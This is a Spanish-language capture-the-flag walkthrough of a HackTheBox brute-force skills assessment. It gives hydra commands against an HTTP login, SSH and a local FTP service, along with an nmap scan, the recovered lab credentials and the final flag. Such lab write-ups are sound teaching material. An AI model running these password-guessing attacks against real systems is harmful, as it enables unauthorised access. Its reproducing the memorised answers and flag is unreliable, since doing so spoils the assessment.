---
title: "Writeup Skills Assessment - Brute Force — HackTheBox"
machine: "Skills Assessment - Brute Force"
platform: "HackTheBox"
difficulty: "Muy fácil"
operating_system: ["Linux"]
tags: ["brute-force", "web", "hydra", "ssh", "ftp", "linux"]
author: "juanluismm520"
author_url: "https://www.writeups.es/u/juanluismm520"
source: "https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520"
license: "CC BY-SA 4.0"
published: "2026-09-03T15:19:58.866865+00:00"
updated: "2026-09-06T16:15:58.893562+00:00"
words: 244
reading_minutes: 1
summary: "Debemos atacar dos laboratorios relacionados en los que debemos explotar ataques de fuerza bruta a partir de diccionarios dados."
---# Skills Assessment - Brute Force — HackTheBox

**Resumen:** Debemos atacar dos laboratorios relacionados en los que debemos explotar ataques de fuerza bruta a partir de diccionarios dados.

# Parte 1
## Descarga de diccionarios
HTB nos manda dos diccionarios para usar. Los podemos descargar usando `curl`
```bash
curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt

```

## Explotación
Cuando entramos a la IP:PORT dada por HTB nos lleva a un auth login sencillo, usamos hydra con el módulo http-get
```bash
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 154.57.164.77 http-get / -s 33183 -t 64
```
Donde `-s` es el puerto que nos da HTB y `-t` lo usamos para que vaya de forma más rápida. 

Nos salen las credenciales 
> [!SPOILER]
> admin:Admin123
> ![Imagen](https://heqkdeabwizixwftdumf.supabase.co/storage/v1/object/public/writeup-images/318f5db5-2777-441d-bccc-080db9bfff1e/bc9f0427-3f85-4433-997a-67e6ac28652f.webp)
>
> El usuario que necesitaremos para la parte dos es: `satwossh`

En el spoiler podemos ver como hemos conseguido entrar. 


# Parte 2
## Identificación del servicio
Básicamente nos da otra dirección ip y puerto. Si hacemos un nmap estamos ante un ssh. 
```bash
┌─[eu-academy-5]─[10.10.14.177]─[htb-ac-2334078@htb-4oit61rhs6]─[~]
└──╼ [★]$ nmap -sV 154.57.164.77 -p 32690 -Pn 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-09-06 10:43 EDT
Nmap scan report for 154-57-164-77.static.isp.htb.systems (154.57.164.77)
Host is up (0.0067s latency).

PORT      STATE SERVICE VERSION
32690/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

```

Debemos hacer fuerza bruta a ssh usando el usuario conseguido anteriormente. 

## Explotación
```bash
hydra -l spoiler -P passwords.txt 154.57.164.77 ssh -s 32690 -t 64 -f 
```

Nos dará la contraseña
> [!SPOILER]
> [32690][ssh] host: 154.57.164.77   login: satwossh   password: password1

Nos metemos por ssh
```bash
ssh spoiler@154.57.164.77 -p 32690
```


Una vez dentro tenemos lo siguiente:
![Imagen](https://heqkdeabwizixwftdumf.supabase.co/storage/v1/object/public/writeup-images/318f5db5-2777-441d-bccc-080db9bfff1e/24acdb9b-f8f6-4c3b-8a17-208554b764a8.webp)

Como vemos parece que hay que usar la herramienta username-anarchy y el diccionario passwords. Además nos dice que hay un usuario que ha tenido problemas con el ftp (**_Thomas Smith_**). No solo eso sino que tenemos `hydra` en la máquina a la que estamos conectados por ssh.

Para crear el diccionarios con username anarchy es extremadamente sencillo. 
```bash
./username-anarchy Thomas Smith > thomas.txt
```
Con eso ya tendremos el diccionario y procedemos a usar hydra al servicio ftp de localhost. Para comprobar que está abierto simplemente con `netstat -tulnp` podemos verificarlo. 

```bash
hydra -L thomas.txt -P passwords.txt ftp 127.0.0.1 -t 64 -f
```

> [!SPOILER]
> [21][ftp] host: 127.0.0.1   login: thomas   password: chocolate!

Una vez tengamos las credenciales ejecutamos estos comandos para sacar la flag
```bash
ftp localhost
(Introducimos usuario y contraseña)
ls
get flag.txt
bye
cat flag.txt
```

Obteniendo así:
> [!SPOILER]
> flag.txt: HTB{brut3f0rc1ng_succ3ssful}
---

> Writeup de **juanluismm520** publicado en [writeups.es](https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520).
> Si citas este contenido, enlaza a la fuente original.
